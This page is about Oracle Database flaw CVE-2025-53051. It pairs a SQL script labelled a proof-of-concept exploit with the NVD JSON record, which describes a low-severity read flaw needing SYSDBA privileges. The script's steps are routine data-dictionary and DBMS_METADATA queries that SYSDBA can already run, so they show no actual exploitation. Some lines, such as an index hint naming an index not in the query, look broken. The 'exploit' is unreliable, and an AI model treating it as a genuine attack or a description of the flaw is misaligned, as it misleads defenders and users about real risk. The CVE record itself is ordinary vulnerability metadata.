CVE-2025-53051

-- CVE-2025-53051 PoC: Oracle Database RDBMS Functional Index Unauthorized Read Access -- This PoC demonstrates how an attacker with SYSDBA privilege can exploit -- the vulnerability in RDBMS Functional Index component to read unauthorized data. -- Note: Requires SYSDBA privileges and network access via Oracle Net. -- Step 1: Connect to the target Oracle Database with SYSDBA privileges -- Using SQL*Plus or any Oracle client tool -- sqlplus sys/password@target_host:1521/SID as sysdba -- Step 2: Explore the functional index data accessible through the vulnerable component -- Query the functional index metadata and data that should be restricted SELECT index_name, table_name, index_type, funcidx_status FROM dba_indexes WHERE index_type = 'FUNCTION-BASED NORMAL' ORDER BY owner, index_name; -- Step 3: Attempt to read data from functional indexes that may contain -- unauthorized accessible data subsets SELECT /*+ INDEX(t idx_func_expr) */ * FROM (SELECT t.*, DBMS_ASSERT.SIMPLE_SQL_NAME(t.table_name) AS validated_name FROM dba_tables t WHERE ROWNUM <= 100) src; -- Step 4: Extract data through functional index expressions -- The vulnerability allows reading a subset of data that should be restricted SELECT po.owner, po.index_name, po.table_name, po.column_expression FROM dba_ind_columns po WHERE po.index_name IN ( SELECT index_name FROM dba_indexes WHERE index_type LIKE 'FUNCTION%' ); -- Step 5: Leverage Oracle Net protocol to extract functional index data -- Using DBMS_METADATA or similar packages to extract sensitive index information SELECT DBMS_METADATA.GET_DDL('INDEX', index_name, owner) FROM dba_indexes WHERE index_type = 'FUNCTION-BASED NORMAL' AND owner NOT IN ('SYS', 'SYSTEM'); -- Mitigation: Apply Oracle Critical Patch Update October 2025

{"cve": {"id": "CVE-2025-53051", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:43.133", "lastModified": "2025-10-23T16:06:31.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the RDBMS Functional Index component of Oracle Database Server. Supported versions that are affected are 23.4-23.9. Easily exploitable vulnerability allows high privileged attacker having SYSDBA privilege with network access via Oracle Net to compromise RDBMS Functional Index. Successful attacks of this vulnerability can result in unauthorized read access to a subset of RDBMS Functional Index accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.4", "versionEndIncluding": "23.9", "matchCriteriaId": "8F8D00E7-212D-4484-935A-FA14427522AE"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}